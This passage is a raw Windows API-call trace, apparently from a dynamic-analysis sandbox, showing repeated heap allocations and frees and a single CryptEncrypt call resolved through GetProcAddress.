0x2e54d28 [0145.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0145.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0145.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0145.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0145.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0145.970] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0145.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0145.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0145.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0145.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0145.970] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0145.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0145.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0145.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0145.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0145.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0145.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0145.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0145.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0145.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0145.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0145.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0145.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0145.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0145.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0145.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0145.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0145.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0145.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0145.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0145.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0145.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0145.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0145.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0145.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0145.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0145.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0145.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0145.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0145.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0145.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0145.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0145.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0145.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0145.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0145.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0145.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0145.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0145.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0145.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0145.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0145.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0145.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0145.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0145.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0145.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0145.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0145.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c4e) returned 0x2e90338 [0145.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0145.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e90338 | out: hHeap=0x970000) returned 1 [0145.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0145.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0145.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0145.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0145.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0145.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0145.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0145.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0145.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0145.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0145.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0145.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0145.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0145.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0145.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0145.978] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0145.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0145.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0145.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0145.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0145.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0145.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0145.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0145.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0145.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0145.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0145.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0145.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0145.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0145.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0145.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0145.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0145.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0145.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0145.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0145.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0145.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0145.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0145.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0145.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0145.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0145.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0145.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0145.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0145.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0145.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0145.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0145.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0145.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0145.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0145.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0145.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0145.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0145.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0145.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0145.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0145.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0145.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0145.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0145.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0145.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0145.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0145.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0145.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0145.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0145.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0145.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0145.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0145.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0145.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0145.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0145.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0145.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0145.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0145.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0145.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0145.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0145.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0145.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0145.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0145.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0145.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0146.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0146.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0146.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0146.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0146.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0146.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0146.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0146.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0146.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0146.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0146.189] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0146.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0146.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0146.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0146.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0146.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0146.192] CryptEncrypt (in: hKey=0xa87410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x13c4e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x13c50) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0146.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0146.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) 